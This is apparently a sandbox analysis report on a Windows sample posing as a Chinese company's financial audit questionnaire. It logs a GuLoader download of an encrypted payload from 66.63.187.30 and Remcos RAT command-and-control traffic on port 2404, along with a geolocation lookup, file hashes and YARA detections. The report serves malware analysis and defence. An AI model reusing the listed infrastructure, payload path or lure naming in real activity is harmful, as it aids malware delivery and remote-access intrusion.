                                                                                                  Dec 16, 2024 17:05:06.415997028 CET240449822162.251.122.87192.168.2.6
                                                                                                  Dec 16, 2024 17:05:06.416030884 CET240449822162.251.122.87192.168.2.6
                                                                                                  Dec 16, 2024 17:05:06.416089058 CET498222404192.168.2.6162.251.122.87
                                                                                                  Dec 16, 2024 17:05:06.416836977 CET240449822162.251.122.87192.168.2.6
                                                                                                  Dec 16, 2024 17:05:06.416896105 CET240449822162.251.122.87192.168.2.6
                                                                                                  Dec 16, 2024 17:05:06.416899920 CET498222404192.168.2.6162.251.122.87
                                                                                                  Dec 16, 2024 17:05:06.417519093 CET240449822162.251.122.87192.168.2.6
                                                                                                  Dec 16, 2024 17:05:06.417553902 CET240449822162.251.122.87192.168.2.6
                                                                                                  Dec 16, 2024 17:05:06.417589903 CET498222404192.168.2.6162.251.122.87
                                                                                                  Dec 16, 2024 17:05:06.418463945 CET240449822162.251.122.87192.168.2.6
                                                                                                  Dec 16, 2024 17:05:06.418498993 CET240449822162.251.122.87192.168.2.6
                                                                                                  Dec 16, 2024 17:05:06.418530941 CET498222404192.168.2.6162.251.122.87
                                                                                                  Dec 16, 2024 17:05:06.419491053 CET240449822162.251.122.87192.168.2.6
                                                                                                  Dec 16, 2024 17:05:06.419526100 CET240449822162.251.122.87192.168.2.6
                                                                                                  Dec 16, 2024 17:05:06.419558048 CET498222404192.168.2.6162.251.122.87
                                                                                                  Dec 16, 2024 17:05:06.420453072 CET240449822162.251.122.87192.168.2.6
                                                                                                  Dec 16, 2024 17:05:06.420488119 CET240449822162.251.122.87192.168.2.6
                                                                                                  Dec 16, 2024 17:05:06.420660973 CET498222404192.168.2.6162.251.122.87
                                                                                                  Dec 16, 2024 17:05:06.421525955 CET240449822162.251.122.87192.168.2.6
                                                                                                  Dec 16, 2024 17:05:06.421561956 CET240449822162.251.122.87192.168.2.6
                                                                                                  Dec 16, 2024 17:05:06.421593904 CET498222404192.168.2.6162.251.122.87
                                                                                                  Dec 16, 2024 17:05:06.422466993 CET240449822162.251.122.87192.168.2.6
                                                                                                  Dec 16, 2024 17:05:06.422502041 CET240449822162.251.122.87192.168.2.6
                                                                                                  Dec 16, 2024 17:05:06.422535896 CET498222404192.168.2.6162.251.122.87
                                                                                                  Dec 16, 2024 17:05:06.423511028 CET240449822162.251.122.87192.168.2.6
                                                                                                  Dec 16, 2024 17:05:06.423547029 CET240449822162.251.122.87192.168.2.6
                                                                                                  Dec 16, 2024 17:05:06.423604965 CET498222404192.168.2.6162.251.122.87
                                                                                                  Dec 16, 2024 17:05:06.424571037 CET240449822162.251.122.87192.168.2.6
                                                                                                  Dec 16, 2024 17:05:06.424607992 CET240449822162.251.122.87192.168.2.6
                                                                                                  Dec 16, 2024 17:05:06.424640894 CET498222404192.168.2.6162.251.122.87
                                                                                                  Dec 16, 2024 17:05:06.425568104 CET240449822162.251.122.87192.168.2.6
                                                                                                  Dec 16, 2024 17:05:06.425606966 CET240449822162.251.122.87192.168.2.6
                                                                                                  Dec 16, 2024 17:05:06.425638914 CET498222404192.168.2.6162.251.122.87
                                                                                                  Dec 16, 2024 17:05:06.426542997 CET240449822162.251.122.87192.168.2.6
                                                                                                  Dec 16, 2024 17:05:06.426578999 CET240449822162.251.122.87192.168.2.6
                                                                                                  Dec 16, 2024 17:05:06.426620007 CET498222404192.168.2.6162.251.122.87
                                                                                                  Dec 16, 2024 17:05:06.427580118 CET240449822162.251.122.87192.168.2.6
                                                                                                  Dec 16, 2024 17:05:06.427614927 CET240449822162.251.122.87192.168.2.6
                                                                                                  Dec 16, 2024 17:05:06.427721977 CET498222404192.168.2.6162.251.122.87
                                                                                                  Dec 16, 2024 17:05:06.428535938 CET240449822162.251.122.87192.168.2.6
                                                                                                  Dec 16, 2024 17:05:06.428913116 CET498222404192.168.2.6162.251.122.87
                                                                                                  Dec 16, 2024 17:05:06.429155111 CET240449822162.251.122.87192.168.2.6
                                                                                                  Dec 16, 2024 17:05:06.429605007 CET240449822162.251.122.87192.168.2.6
                                                                                                  Dec 16, 2024 17:05:06.429641008 CET240449822162.251.122.87192.168.2.6
                                                                                                  Dec 16, 2024 17:05:06.429718018 CET498222404192.168.2.6162.251.122.87
                                                                                                  Dec 16, 2024 17:05:06.430556059 CET240449822162.251.122.87192.168.2.6
                                                                                                  Dec 16, 2024 17:05:06.430591106 CET240449822162.251.122.87192.168.2.6
                                                                                                  Dec 16, 2024 17:05:06.430628061 CET498222404192.168.2.6162.251.122.87
                                                                                                  Dec 16, 2024 17:05:06.431583881 CET240449822162.251.122.87192.168.2.6
                                                                                                  Dec 16, 2024 17:05:06.431618929 CET240449822162.251.122.87192.168.2.6
                                                                                                  Dec 16, 2024 17:05:06.431768894 CET498222404192.168.2.6162.251.122.87
                                                                                                  Dec 16, 2024 17:05:06.432585001 CET240449822162.251.122.87192.168.2.6
                                                                                                  Dec 16, 2024 17:05:06.432621002 CET240449822162.251.122.87192.168.2.6
                                                                                                  Dec 16, 2024 17:05:06.432652950 CET498222404192.168.2.6162.251.122.87
                                                                                                  Dec 16, 2024 17:05:06.433732986 CET240449822162.251.122.87192.168.2.6
                                                                                                  Dec 16, 2024 17:05:06.433768034 CET240449822162.251.122.87192.168.2.6
                                                                                                  Dec 16, 2024 17:05:06.433799982 CET498222404192.168.2.6162.251.122.87
                                                                                                  Dec 16, 2024 17:05:06.434712887 CET240449822162.251.122.87192.168.2.6
                                                                                                  Dec 16, 2024 17:05:06.434746981 CET240449822162.251.122.87192.168.2.6
                                                                                                  Dec 16, 2024 17:05:06.434777021 CET498222404192.168.2.6162.251.122.87
                                                                                                  Dec 16, 2024 17:05:06.435626984 CET240449822162.251.122.87192.168.2.6
                                                                                                  Dec 16, 2024 17:05:06.435661077 CET240449822162.251.122.87192.168.2.6
                                                                                                  Dec 16, 2024 17:05:06.435766935 CET498222404192.168.2.6162.251.122.87
                                                                                                  Dec 16, 2024 17:05:06.436536074 CET240449822162.251.122.87192.168.2.6
                                                                                                  Dec 16, 2024 17:05:06.436664104 CET498222404192.168.2.6162.251.122.87
                                                                                                  Dec 16, 2024 17:05:06.564125061 CET240449822162.251.122.87192.168.2.6
                                                                                                  Dec 16, 2024 17:05:06.564568043 CET240449822162.251.122.87192.168.2.6
                                                                                                  Dec 16, 2024 17:05:06.564819098 CET498222404192.168.2.6162.251.122.87
                                                                                                  Dec 16, 2024 17:05:06.565062046 CET240449822162.251.122.87192.168.2.6
                                                                                                  Dec 16, 2024 17:05:06.565140963 CET240449822162.251.122.87192.168.2.6
                                                                                                  Dec 16, 2024 17:05:06.565757990 CET240449822162.251.122.87192.168.2.6
                                                                                                  Dec 16, 2024 17:05:06.566070080 CET498222404192.168.2.6162.251.122.87
                                                                                                  Dec 16, 2024 17:05:06.566313028 CET240449822162.251.122.87192.168.2.6
                                                                                                  Dec 16, 2024 17:05:06.566565990 CET498222404192.168.2.6162.251.122.87
                                                                                                  Dec 16, 2024 17:05:06.566677094 CET240449822162.251.122.87192.168.2.6
                                                                                                  Dec 16, 2024 17:05:06.567347050 CET240449822162.251.122.87192.168.2.6
                                                                                                  Dec 16, 2024 17:05:06.567471981 CET498222404192.168.2.6162.251.122.87
                                                                                                  Dec 16, 2024 17:05:06.567872047 CET240449822162.251.122.87192.168.2.6
                                                                                                  Dec 16, 2024 17:05:06.568094969 CET240449822162.251.122.87192.168.2.6
                                                                                                  Dec 16, 2024 17:05:06.568180084 CET498222404192.168.2.6162.251.122.87
                                                                                                  Dec 16, 2024 17:05:06.568903923 CET240449822162.251.122.87192.168.2.6
                                                                                                  Dec 16, 2024 17:05:06.569284916 CET240449822162.251.122.87192.168.2.6
                                                                                                  Dec 16, 2024 17:05:06.569428921 CET498222404192.168.2.6162.251.122.87
                                                                                                  Dec 16, 2024 17:05:06.569933891 CET240449822162.251.122.87192.168.2.6
                                                                                                  Dec 16, 2024 17:05:06.570141077 CET240449822162.251.122.87192.168.2.6
                                                                                                  Dec 16, 2024 17:05:06.570255995 CET498222404192.168.2.6162.251.122.87
                                                                                                  Dec 16, 2024 17:05:06.571038961 CET240449822162.251.122.87192.168.2.6
                                                                                                  Dec 16, 2024 17:05:06.571305990 CET240449822162.251.122.87192.168.2.6
                                                                                                  Dec 16, 2024 17:05:06.571381092 CET498222404192.168.2.6162.251.122.87
                                                                                                  Dec 16, 2024 17:05:06.572144985 CET240449822162.251.122.87192.168.2.6
                                                                                                  Dec 16, 2024 17:05:06.572539091 CET240449822162.251.122.87192.168.2.6
                                                                                                  Dec 16, 2024 17:05:06.572645903 CET498222404192.168.2.6162.251.122.87
                                                                                                  Dec 16, 2024 17:05:06.573477983 CET240449822162.251.122.87192.168.2.6
                                                                                                  Dec 16, 2024 17:05:06.573654890 CET240449822162.251.122.87192.168.2.6
                                                                                                  Dec 16, 2024 17:05:06.573808908 CET498222404192.168.2.6162.251.122.87
                                                                                                  Dec 16, 2024 17:05:06.574382067 CET240449822162.251.122.87192.168.2.6
                                                                                                  Dec 16, 2024 17:05:06.574736118 CET240449822162.251.122.87192.168.2.6
                                                                                                  Dec 16, 2024 17:05:06.574970007 CET498222404192.168.2.6162.251.122.87
                                                                                                  Dec 16, 2024 17:05:06.575882912 CET240449822162.251.122.87192.168.2.6
                                                                                                  Dec 16, 2024 17:05:06.576206923 CET240449822162.251.122.87192.168.2.6
                                                                                                  Dec 16, 2024 17:05:06.576644897 CET498222404192.168.2.6162.251.122.87
                                                                                                  Dec 16, 2024 17:05:06.576900005 CET240449822162.251.122.87192.168.2.6
                                                                                                  Dec 16, 2024 17:05:06.576956034 CET240449822162.251.122.87192.168.2.6
                                                                                                  Dec 16, 2024 17:05:06.577294111 CET498222404192.168.2.6162.251.122.87
                                                                                                  Dec 16, 2024 17:05:06.577686071 CET240449822162.251.122.87192.168.2.6
                                                                                                  Dec 16, 2024 17:05:06.577892065 CET240449822162.251.122.87192.168.2.6
                                                                                                  Dec 16, 2024 17:05:06.578166962 CET498222404192.168.2.6162.251.122.87
                                                                                                  Dec 16, 2024 17:05:06.578773975 CET240449822162.251.122.87192.168.2.6
                                                                                                  Dec 16, 2024 17:05:06.579107046 CET240449822162.251.122.87192.168.2.6
                                                                                                  Dec 16, 2024 17:05:06.579157114 CET498222404192.168.2.6162.251.122.87
                                                                                                  Dec 16, 2024 17:05:09.230829954 CET498222404192.168.2.6162.251.122.87
                                                                                                  Dec 16, 2024 17:05:09.352428913 CET240449822162.251.122.87192.168.2.6
                                                                                                  Dec 16, 2024 17:05:09.352444887 CET240449822162.251.122.87192.168.2.6
                                                                                                  Dec 16, 2024 17:05:09.352495909 CET498222404192.168.2.6162.251.122.87
                                                                                                  Dec 16, 2024 17:05:09.352545023 CET498222404192.168.2.6162.251.122.87
                                                                                                  Dec 16, 2024 17:05:09.352581024 CET240449822162.251.122.87192.168.2.6
                                                                                                  Dec 16, 2024 17:05:09.352632046 CET498222404192.168.2.6162.251.122.87
                                                                                                  Dec 16, 2024 17:05:09.352741003 CET240449822162.251.122.87192.168.2.6
                                                                                                  Dec 16, 2024 17:05:09.352752924 CET240449822162.251.122.87192.168.2.6
                                                                                                  Dec 16, 2024 17:05:09.352763891 CET240449822162.251.122.87192.168.2.6
                                                                                                  Dec 16, 2024 17:05:09.352906942 CET240449822162.251.122.87192.168.2.6
                                                                                                  Dec 16, 2024 17:05:09.352919102 CET240449822162.251.122.87192.168.2.6
                                                                                                  Dec 16, 2024 17:05:09.353064060 CET240449822162.251.122.87192.168.2.6
                                                                                                  Dec 16, 2024 17:05:09.353075981 CET240449822162.251.122.87192.168.2.6
                                                                                                  Dec 16, 2024 17:05:09.475456953 CET240449822162.251.122.87192.168.2.6
                                                                                                  Dec 16, 2024 17:05:09.475476027 CET240449822162.251.122.87192.168.2.6
                                                                                                  Dec 16, 2024 17:05:09.475502014 CET240449822162.251.122.87192.168.2.6
                                                                                                  Dec 16, 2024 17:05:09.475543976 CET240449822162.251.122.87192.168.2.6
                                                                                                  Dec 16, 2024 17:05:09.475600958 CET240449822162.251.122.87192.168.2.6
                                                                                                  Dec 16, 2024 17:05:09.475646973 CET240449822162.251.122.87192.168.2.6
                                                                                                  Dec 16, 2024 17:05:09.475902081 CET240449822162.251.122.87192.168.2.6
                                                                                                  Dec 16, 2024 17:05:09.477210045 CET498222404192.168.2.6162.251.122.87
                                                                                                  Dec 16, 2024 17:05:20.579263926 CET240449816162.251.122.87192.168.2.6
                                                                                                  Dec 16, 2024 17:05:20.582284927 CET498162404192.168.2.6162.251.122.87
                                                                                                  Dec 16, 2024 17:05:20.797590017 CET240449816162.251.122.87192.168.2.6
                                                                                                  Dec 16, 2024 17:05:50.660454035 CET240449816162.251.122.87192.168.2.6
                                                                                                  Dec 16, 2024 17:05:50.661791086 CET498162404192.168.2.6162.251.122.87
                                                                                                  Dec 16, 2024 17:05:50.781589985 CET240449816162.251.122.87192.168.2.6
                                                                                                  Dec 16, 2024 17:06:20.740226984 CET240449816162.251.122.87192.168.2.6
                                                                                                  Dec 16, 2024 17:06:20.741914034 CET498162404192.168.2.6162.251.122.87
                                                                                                  Dec 16, 2024 17:06:20.861959934 CET240449816162.251.122.87192.168.2.6
                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  Dec 16, 2024 17:05:03.428833961 CET5569753192.168.2.61.1.1.1
                                                                                                  Dec 16, 2024 17:05:03.570179939 CET53556971.1.1.1192.168.2.6
                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                  Dec 16, 2024 17:05:03.428833961 CET192.168.2.61.1.1.10xa2eeStandard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                  Dec 16, 2024 17:05:03.570179939 CET1.1.1.1192.168.2.60xa2eeNo error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                                                                  • 66.63.187.30
                                                                                                  • geoplugin.net
                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  0192.168.2.64980866.63.187.30802936C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 16, 2024 17:04:57.163186073 CET185OUTGET /GrDfwEbxHEuyrsJcDgnTLZ14.bin HTTP/1.1
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                  Host: 66.63.187.30
                                                                                                  Cache-Control: no-cache
                                                                                                  Dec 16, 2024 17:04:58.519109964 CET1236INHTTP/1.1 200 OK
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Last-Modified: Sun, 15 Dec 2024 21:27:06 GMT
                                                                                                  Accept-Ranges: bytes
                                                                                                  ETag: "e4427917384fdb1:0"
                                                                                                  Server: Microsoft-IIS/10.0
                                                                                                  Date: Mon, 16 Dec 2024 16:04:58 GMT
                                                                                                  Content-Length: 493120
                                                                                                  Data Raw: 27 df cd e1 19 a0 1a 8a d6 54 af 67 7d e3 5a 2a 55 91 f2 50 f0 d1 79 ec d9 da 08 b8 25 fa 57 e2 d9 75 6b f3 ea 0a 98 6b 14 1d 6e 7c ba 23 43 61 20 dd b9 bf cc bc 14 f4 b7 62 ca d3 ac de 08 69 c4 27 99 83 20 3c 8f e1 21 59 62 c7 43 e4 b9 70 af 85 43 c6 45 74 fd 0e d9 be 24 6a f0 b0 3e c2 69 18 c3 5a d7 88 bc d5 4c 6e e8 96 84 1a 13 99 6b ba e1 45 30 3b 84 80 b5 49 c2 a0 a2 85 d0 0f 70 46 db ab 7b 8c a2 15 bb b9 f8 98 4a e0 50 58 07 f7 61 23 26 72 73 fe 0c 72 17 1d dd ae 0d 4b 09 d2 fb 78 72 02 bc dc 17 c3 2d fc 09 bf 45 db 06 4f 6e 84 0c 9f 93 db 62 b0 d9 c5 59 c5 6a 30 ba f1 bc e0 9b 2b 48 c9 bf 3c 52 93 2d 37 ef ed 87 60 fb fd 24 2e 13 92 44 4a 82 03 a7 e0 01 54 8c 1f 0f bd 5b 70 67 c7 c3 df 95 07 05 c1 e2 9a 9f 41 8b 7d 42 64 24 cd d7 22 70 8b a8 17 9c d3 b7 20 72 f4 bd f6 ca 84 9b fb c4 2d 88 00 1f ed 10 ae a9 77 32 8a bc 14 ad be bf df b0 f7 b6 e3 3d f7 3f e5 ff 78 cd 63 48 99 b4 db 89 7c c5 e7 da e7 ca fd aa ed f0 4e ba 97 14 be bd 70 a8 12 0f 6d a9 b5 2a cf 13 22 38 8b 8d be f1 bf 32 d0 c4 95 [TRUNCATED]
                                                                                                  Data Ascii: 'Tg}Z*UPy%Wukkn|#Ca bi' <!YbCpCEt$j>iZLnkE0;IpF{JPXa#&rsrKxr-EOnbYj0+H<R-7`$.DJT[pgA}Bd$"p r-w2=?xcH|Npm*"82|uJ]30}53e).w~<{&E'bso{qwwgw2uwx~DTwnHB9^0n<|&6;*^II7dPp)c0M[X{uE%_9pJ$c6u"%;p~(g\u{-"*v.WZ!i'Vz3R#jk:z6%~]\.DM.kC}v8A2j)H-!21S3d&JuykpR3mUW>bnyQBT"&"I<~:~!+Tr/U$b~(M034Hk5LilHtQL6=WXj)-5>Al0'EIQ`_b\A++wZb<7nP%:a";MtV$7o-C)unwO`S>&<r!@M_gLG
                                                                                                  Dec 16, 2024 17:04:58.519186020 CET1236INData Raw: 33 e4 5e 94 40 d3 ac 3a 8b cf 6f 5c d4 b8 7a af 60 9a 3c d5 2b dc 32 57 72 db 4c a9 3c 0e cf 66 f0 f8 f2 9a 41 5a 07 71 d8 de 80 55 ad 45 1c eb 34 92 2b 01 74 d4 6b 4b 6c 65 cb f0 60 b8 de d6 49 82 f8 47 63 26 6b 9d 09 55 0b 76 7c ad 20 8c 8a 3f
                                                                                                  Data Ascii: 3^@:o\z`<+2WrL<fAZqUE4+tkKle`IGc&kUv| ?;F?g09sHlY9/np6obmUHG?sln)v|vD,RrSv'+!f{G9f(yG#zJ?`aKdA#;j
                                                                                                  Dec 16, 2024 17:04:58.519201040 CET1236INData Raw: 3c 5e 42 7f b8 b5 7a 9e 7f d0 58 08 2e 22 c4 8d ff d7 98 d7 3c 94 fd b2 25 f1 ac f5 35 e1 4d cc 2d ed 79 28 5e 49 f3 4f 5f 54 5c b8 70 e7 f1 e2 94 72 90 b7 5a 9b 0c 8b 2b e7 10 b5 dc fd cb 6d d5 17 17 a2 58 58 9e 7d 19 45 dc 39 b0 8e 5f d1 f9 eb
                                                                                                  Data Ascii: <^BzX."<%5M-y(^IO_T\prZ+mXX}E9_pJ;c:{d0K5~xrr7EH~ `*3F>Zj0VF.iUX3oh#;jv{!vq% 8^vQaD3[:wvI_-
                                                                                                  Dec 16, 2024 17:04:58.519548893 CET1236INData Raw: de bd a3 7f 69 f3 ef 2a f3 39 a4 c9 98 28 3c 7f 43 61 2c fb 29 ea 70 68 22 7f 1b a1 3a 43 78 a5 6d 1b 1a 67 30 83 78 9e b6 46 7d 2f 9f 20 cb 59 99 6b 46 4b 62 47 12 45 f2 de f9 2c 38 11 91 04 a9 f4 38 85 3d 3d a7 9a 46 94 7d 8d da 96 e9 9c 3e 23
                                                                                                  Data Ascii: i*9(<Ca,)ph":Cxmg0xF}/ YkFKbGE,88==F}>#&i1x$`"J,JWX$@iZZfNH&!}j-tI;r_?*$X_w;'|_J~"$yJUASi7~>::H7
                                                                                                  Dec 16, 2024 17:04:58.519562006 CET1236INData Raw: ae ea 5a a7 13 54 b3 81 bc 89 eb 2d 3e 52 f6 1f 78 00 20 59 c6 51 29 97 99 f4 dd bc 6f 36 8b 89 b3 7f 7d bd 63 fc c1 3e 8e de 5f c3 a7 af aa 14 7e 46 93 62 02 14 63 38 a2 b5 d2 aa c0 31 33 3d 6d 26 61 fa 8b 51 de 88 6b 09 6b 83 df 17 2d c9 9a 33
                                                                                                  Data Ascii: ZT->Rx YQ)o6}c>_~Fbc813=m&aQkk-3!u~%W<T|} >6Wn@xsVBo*,9,+O7mOX#jA!905uMw|:BO(D;_G>Sjv${uoC0h%i%N
                                                                                                  Dec 16, 2024 17:04:58.520003080 CET1236INData Raw: 46 24 fc ce 5f 5c 18 e5 6b d5 84 04 b8 76 d0 c3 57 80 e2 07 f6 26 e9 3b e4 35 f9 94 e6 f1 81 5a 1a 35 a3 21 9f 07 0e bc de 37 f8 cd 7a c6 16 5d f9 62 91 f6 0f 23 ee a5 54 29 fc b0 0f d1 1c 8a 4f 57 f6 53 0d 45 55 25 fe dc 5f 8d e1 2d d4 7e 04 1b
                                                                                                  Data Ascii: F$_\kvW&;5Z5!7z]b#T)OWSEU%_-~lhJV1d]< nUy'@zu5s&"vZVJaTBIe*1SI]Gr^,c';;Xn98H8I9j\\Agb imf=fW8<
                                                                                                  Dec 16, 2024 17:04:58.520016909 CET1236INData Raw: e0 79 e1 33 eb fd 94 96 6c e7 52 5c 79 37 1f a4 ac 1e 69 7b 4a fb 76 86 45 1e 1c 60 b0 4a 68 f4 be 3d 5f 21 42 8e cc 2d 0f 36 2e 81 b3 72 30 28 f6 06 2b 0c 0e ec c9 94 7b be d8 18 39 04 07 9d f7 d9 84 43 3f 60 d4 f6 39 cf f5 36 76 c9 b2 60 21 88
                                                                                                  Data Ascii: y3lR\y7i{JvE`Jh=_!B-6.r0(+{9C?`96v`!4T.Yv0@Nk\htqK,J(#K$JL< ;~Iyu*Y5!$4nhO{^a5dh;9.GZI"\m^"8
                                                                                                  Dec 16, 2024 17:04:58.520029068 CET1236INData Raw: f4 fc bd 46 77 1b 45 94 88 e7 1a d3 c7 46 4f 6b 81 f0 0b 49 fb b8 0a d3 db a7 e0 e4 3c f5 cb 72 b7 11 35 70 09 3f ae 8e 1d ce e8 98 a1 7a 52 7f db 2e 8e ad 32 90 30 6c 76 46 89 ca d5 99 e0 16 04 71 bb f0 25 eb 20 eb 5f cb c5 3b 3d 98 4a b8 b3 40
                                                                                                  Data Ascii: FwEFOkI<r5p?zR.20lvFq% _;=J@{l5i^wv4!d;q7yQX%^k%5zDLR`232Xi:"ZI{WC'&G}mUSwPq)P@.W/T@WS>lc,R
                                                                                                  Dec 16, 2024 17:04:58.520617962 CET1236INData Raw: 96 7a 2f 00 17 c8 49 07 8b a9 34 81 58 a6 76 93 2d c2 e9 7f 21 f6 15 7e cf 4d a2 1e be ff 6b 1e 0d 72 0a 3b f7 6e 47 ca b3 28 94 79 6c 9a 9a 96 b1 81 4c 47 1b 55 0b e4 de be a2 a7 1f e9 57 09 c6 73 6e 63 29 55 0c f9 3d 94 bc 66 94 4c 70 9f 29 91
                                                                                                  Data Ascii: z/I4Xv-!~Mkr;nG(ylLGUWsnc)U=fLp)wkqx6.F&"wj50~y]@,Oxdm<)/|a*:m;evQS=T[,pw8sx7*jo_DzE[L7CkXLx?,P]whZ*
                                                                                                  Dec 16, 2024 17:04:58.520632029 CET1236INData Raw: 04 d4 7b bf 8b 57 aa ec 07 55 fb f6 a6 f5 b7 39 99 dd ba f7 88 18 3a 3c 1c 61 d2 57 d7 3d 9a 5f 45 d1 a2 cb 33 56 18 9f a7 0d 50 cc f3 cf cb 45 40 9e 2e 54 f1 ec 5a a2 fd cc ee fc 9a 21 20 31 b5 59 85 39 45 d5 30 98 66 4c ee 04 bd 56 9e 64 87 47
                                                                                                  Data Ascii: {WU9:<aW=_E3VPE@.TZ! 1Y9E0fLVdG"boQj,<~FK`n^'@`03*pxcCPqj7FEAM_}<q gS0 W7|t?>`JOhRQ!b+s
                                                                                                  Dec 16, 2024 17:04:58.639205933 CET1236INData Raw: 21 3d 6c c9 a2 e0 4f dc fa 52 19 be db c3 23 a6 e0 3b 62 52 ce fe 65 41 27 e4 f4 82 d8 b5 4a f1 05 1f 11 12 4c 10 97 63 3e 7a 08 89 aa ea e3 fc df 5a 4c 23 89 1c bb 1b b1 f3 fe c6 14 9b d3 3d 5d 3b 76 8b e4 88 67 b1 87 59 a5 7d fb 9a d5 c6 0b 4d
                                                                                                  Data Ascii: !=lOR#;bReA'JLc>zZL#=];vgY}M=Iy>H8OdZFFNI'8;!gY_9J.v}\&lVTLR}TGE&y=cc&I5'i;fe\/Hk{|5j# EoyNU


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  1192.168.2.649824178.237.33.50802936C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 16, 2024 17:05:03.696738958 CET71OUTGET /json.gp HTTP/1.1
                                                                                                  Host: geoplugin.net
                                                                                                  Cache-Control: no-cache
                                                                                                  Dec 16, 2024 17:05:04.951934099 CET1171INHTTP/1.1 200 OK
                                                                                                  date: Mon, 16 Dec 2024 16:05:04 GMT
                                                                                                  server: Apache
                                                                                                  content-length: 963
                                                                                                  content-type: application/json; charset=utf-8
                                                                                                  cache-control: public, max-age=300
                                                                                                  access-control-allow-origin: *
                                                                                                  Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 32 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 [TRUNCATED]
                                                                                                  Data Ascii: { "geoplugin_request":"8.46.123.189", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7503", "geoplugin_longitude":"-74.0014", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                                                  Click to jump to process

                                                                                                  Click to jump to process

                                                                                                  Click to dive into process behavior distribution

                                                                                                  Click to jump to process

                                                                                                  Target ID:0
                                                                                                  Start time:11:04:14
                                                                                                  Start date:16/12/2024
                                                                                                  Path:C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe"
                                                                                                  Imagebase:0x400000
                                                                                                  File size:777'304 bytes
                                                                                                  MD5 hash:E1DC71BE5B3466D47A4934013BE9B604
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2466748409.0000000004BEF000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  Reputation:low
                                                                                                  Has exited:true

                                                                                                  Target ID:9
                                                                                                  Start time:11:04:44
                                                                                                  Start date:16/12/2024
                                                                                                  Path:C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe"
                                                                                                  Imagebase:0x400000
                                                                                                  File size:777'304 bytes
                                                                                                  MD5 hash:E1DC71BE5B3466D47A4934013BE9B604
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.3427771345.00000000025CF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.3426501953.000000000019F000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
